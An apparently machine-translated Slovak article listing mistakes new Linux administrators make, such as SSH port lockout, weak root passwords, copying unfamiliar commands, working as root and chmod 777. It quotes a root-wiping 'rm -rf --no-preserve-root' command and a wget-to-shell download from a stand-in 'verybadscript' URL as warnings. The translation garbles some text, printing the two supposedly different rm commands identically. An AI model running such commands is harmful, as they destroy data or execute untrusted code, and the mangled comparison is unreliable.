Príkazový riadok systému Linux dáva správcom servera kontrolu nad ich servermi a údajmi na nich uloženými, ale nezabráni im v spúšťaní deštruktívnych príkazov s následkami, ktoré sa nedajú vrátiť späť. Náhodné odstránenie údajov je iba jedným typom chyby, ktorú robia noví správcovia serverov.
Zamykanie klávesov vo vnútri
Správcovia serverov sa pripájajú k serverom pomocou SSH, služby, ktorá sa zvyčajne spúšťa na porte 22 a poskytuje prihlasovacie prostredie, prostredníctvom ktorého môžu autentifikovaní používatelia spúšťať príkazy na vzdialených serveroch. Štandardným krokom zvýšenia bezpečnosti je nakonfigurovať SSH na prijímanie pripojení na inom porte. Presun SSH na vysoko očíslovaný náhodný port obmedzuje dopad útokov hrubou silou; hackeri sa nemôžu pokúšať o škodlivé prihlásenie, keď nemôžu nájsť port, na ktorom SSH počúva.
Avšak správca, ktorý nakonfiguruje SSH tak, aby počúval na inom porte a potom reštartuje server SSH, môže zistiť, že sú zablokovaní nielen hackeri. Ak brána firewall servera nie je tiež prekonfigurovaná tak, aby umožňovala pripojenie na novom porte, pokusy o pripojenie sa nikdy nedostanú na server SSH. Správca bude uzamknutý zo svojho servera a nebude môcť tento problém vyriešiť, s výnimkou otvorenia lístka podpory u svojho poskytovateľa hostingu. Ak zmeníte port SSH, nezabudnite otvoriť nový port v konfigurácii brány firewall vášho servera.
Výber ľahko uhádnuteľného hesla
Útoky hrubou silou sú tipovacou hrou. Útočník vyskúša mnoho používateľských mien a hesiel, kým nenarazí na kombináciu, ktorá im umožní prístup. Slovníkový útok je prepracovanejší prístup, ktorý využíva zoznamy hesiel, ktoré sa často získavajú z databáz uniknutých hesiel. Útoky na účet root sú jednoduchšie ako na iné účty, pretože útočník už pozná používateľské meno. Ak má účet root jednoduché heslo, môže byť hacknutý okamžite.
Existujú tri spôsoby obrany proti útokom hrubou silou a slovníkom proti účtu root.
- Vyberte si dlhé a zložité heslo. Jednoduché heslá sa dajú ľahko prelomiť; dlhé a zložité heslá sú nemožné.
- Nakonfigurujte SSH na zakázanie prihlásenia root. Toto je jednoduchá zmena konfigurácie, ale uistite sa, že je konfigurácia sudo nakonfigurovaná tak, aby vášmu účtu umožňovala zvyšovať jeho oprávnenia.
- Namiesto hesiel použite autentifikáciu na základe kľúča. Prihlásenie na základe certifikátu úplne odstraňuje riziko útokov hrubou silou.
Kopírovanie príkazov, ktorým nerozumieš
Stack Exchange, Chyba servera a podobné stránky sú pre nových správcov systémov Linux životným prostredím, mali by ste sa však vyhnúť pokušeniu kopírovať a vložiť príkaz shellu, ktorému nerozumiete. Aký je rozdiel medzi týmito dvoma príkazmi?
sudo rm -rf --no-preserve-root / mnt / mydrive /sudo rm -rf --no-preserve-root / mnt / mydrive /
Je ľahké vidieť, keď sa zobrazujú spolu, ale nie tak ľahko, keď prehľadávate fóra a hľadáte príkaz na odstránenie obsahu pripojeného zväzku. Prvý príkaz vymaže všetky súbory na pripojenej jednotke. Druhý príkaz tieto súbory odstráni a všetko v koreňovom súborovom systéme servera. Jediným rozdielom je priestor pred záverečným lomítkom.
Správcovia serverov sa môžu stretnúť s dlhými príkazmi s kanálmi, o ktorých sa hovorí, že robia jednu vec, ale niečo iné. Obzvlášť opatrní buďte pri príkazoch, ktoré sťahujú kód z internetu.
príklad wget http: //.com / verybadscript -O - | š -Tento príkaz používa program wget na stiahnutie skriptu, ktorý je smerovaný do shellu a vykonaný. Aby ste to mohli bezpečne spustiť, musíte pochopiť, čo príkaz robí, a tiež to, čo robí stiahnutý skript vrátane kódu, ktorý si môže stiahnutý skript sám stiahnuť.
Prihlasovanie ako root
Zatiaľ čo bežní používatelia môžu meniť súbory iba vo svojom domovskom priečinku, na serveri Linux je len málo vecí, ktoré by užívateľ root nemohol urobiť. Môže spúšťať akýkoľvek softvér, čítať akékoľvek údaje a mazať akýkoľvek súbor.
Aplikácie spustené používateľom root majú podobnú moc. Je výhodné byť prihlásený ako užívateľ root, pretože nemusíte neustále „sudo“ alebo „su“, ale je to nebezpečné. Preklep by mohol váš server zničiť za pár sekúnd. Buggy softvér spustený používateľom root by mohol spôsobiť katastrofu. Pri každodenných operáciách sa prihláste ako bežný používateľ a oprávnenie typu root zvýšte iba v prípade potreby.
Neučím sa povolenia súborového systému
Povolenia pre súborový systém môžu byť pre nových používateľov systému Linux mätúce a frustrujúce. Reťazec povolení ako „drwxr-xr-x“ vyzerá spočiatku nezmyselne a povolenia vám môžu zabrániť v úprave súborov a zabrániť softvéru robiť to, čo chcete.
Správcovia systému rýchlo zistia, že chmod 777 je čarovné zaklínadlo, ktoré rieši väčšinu z týchto problémov, ale je to hrozný nápad. Umožňuje všetkým používateľom účtu čítať, písať a spúšťať súbory. Ak tento príkaz spustíte v adresári webového servera, žiada vás o hackerstvo. Povolenia súborov pre systém Linux vyzerajú komplikovane, ale ak sa na pár minút dozviete, ako fungujú, objavíte logický a flexibilný systém na kontrolu prístupu k súborom.
V ére, ktorá si váži jednoduché používateľské skúsenosti so všetkými ostatnými faktormi, zostáva príkazový riadok systému Linux rezolútne zložitý a odolný voči zjednodušeniu. Nemôžete sa prehrabať a dúfať, že to bude všetko v poriadku. Nebude to v poriadku a skončíte s katastrofou na rukách.
Ak sa však naučíte základné informácie - oprávnenie k súborom, nástroje príkazového riadku a ich možnosti, osvedčené postupy zabezpečenia - môžete sa stať majstrom jednej z najsilnejších výpočtových platforiem, aké boli kedy vytvorené.